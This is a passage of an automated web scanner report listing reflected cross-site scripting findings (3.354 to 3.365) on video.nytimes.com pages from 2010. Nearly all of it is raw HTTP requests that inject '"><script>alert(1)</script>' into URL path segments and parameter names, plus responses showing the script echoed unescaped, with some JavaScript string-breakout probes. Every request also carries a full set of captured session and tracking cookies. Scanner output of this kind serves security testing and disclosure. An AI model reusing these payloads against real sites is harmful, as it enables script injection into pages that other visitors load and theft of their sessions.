Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 233605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20103a936"><script>alert(1)</script>2e4b7e8b2c/11/08/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458a9"><script>alert(1)</script>23070bfca68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11458a9"><script>alert(1)</script>23070bfca68/08/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:00:25 GMT
Content-type: text/html
Content-Length: 233607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11458a9"><script>alert(1)</script>23070bfca68/08/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb372"><script>alert(1)</script>72f3f3a00df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08bb372"><script>alert(1)</script>72f3f3a00df/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:01:03 GMT
Content-type: text/html
Content-Length: 233607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08bb372"><script>alert(1)</script>72f3f3a00df/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47374"><script>alert(1)</script>934462cbc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/business/media/1248069229412/chinese-animation-.html?47374"><script>alert(1)</script>934462cbc09=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:54:39 GMT
Content-type: text/html
Content-Length: 230204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html?47374"><script>alert(1)</script>934462cbc09=1">
...[SNIP]...

3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/1248069302724/timescast-november-8-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e35"><script>alert(1)</script>ff460568664 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201058e35"><script>alert(1)</script>ff460568664/11/08/world/1248069302724/timescast-november-8-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:56:48 GMT
Content-type: text/html
Content-Length: 233601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201058e35"><script>alert(1)</script>ff460568664/11/08/world/1248069302724/timescast-november-8-2010.html">
...[SNIP]...

3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/1248069302724/timescast-november-8-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3612c"><script>alert(1)</script>d316fe1c103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/world/1248069302724/timescast-november-8-2010.html?3612c"><script>alert(1)</script>d316fe1c103=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:52:00 GMT
Content-type: text/html
Content-Length: 226362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html?3612c"><script>alert(1)</script>d316fe1c103=1">
...[SNIP]...

3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56611"><script>alert(1)</script>f22e89a31ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201056611"><script>alert(1)</script>f22e89a31ea/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:52:45 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201056611"><script>alert(1)</script>f22e89a31ea/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2aff"><script>alert(1)</script>9782dc0ecdb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11d2aff"><script>alert(1)</script>9782dc0ecdb/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:53:55 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11d2aff"><script>alert(1)</script>9782dc0ecdb/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcfaf"><script>alert(1)</script>65ca1884fae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08dcfaf"><script>alert(1)</script>65ca1884fae/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:54:41 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08dcfaf"><script>alert(1)</script>65ca1884fae/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d62c7"%3b6336dde4090 was submitted in the REST URL parameter 5. This input was echoed as d62c7";6336dde4090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/11/08/worldd62c7"%3b6336dde4090/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:57:20 GMT
Content-type: text/html
Content-Length: 177120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworldd62c7";6336dde4090";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "worldd62c7";6336dde4090";
var s_prop2 = "europe";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852a1"><script>alert(1)</script>4cef5bc96c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/world852a1"><script>alert(1)</script>4cef5bc96c4/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:57:02 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world852a1"><script>alert(1)</script>4cef5bc96c4/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9fbd'%3b341b5b8bae5 was submitted in the REST URL parameter 5. This input was echoed as d9fbd';341b5b8bae5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/11/08/worldd9fbd'%3b341b5b8bae5/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 177120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
20from%20environmentalists.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'worldd9fbd';341b5b8bae5' );
}
function getShareSubSection() {
return( 'europe' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decode
...[SNIP]...

3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36d9"><script>alert(1)</script>fa5d622a454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

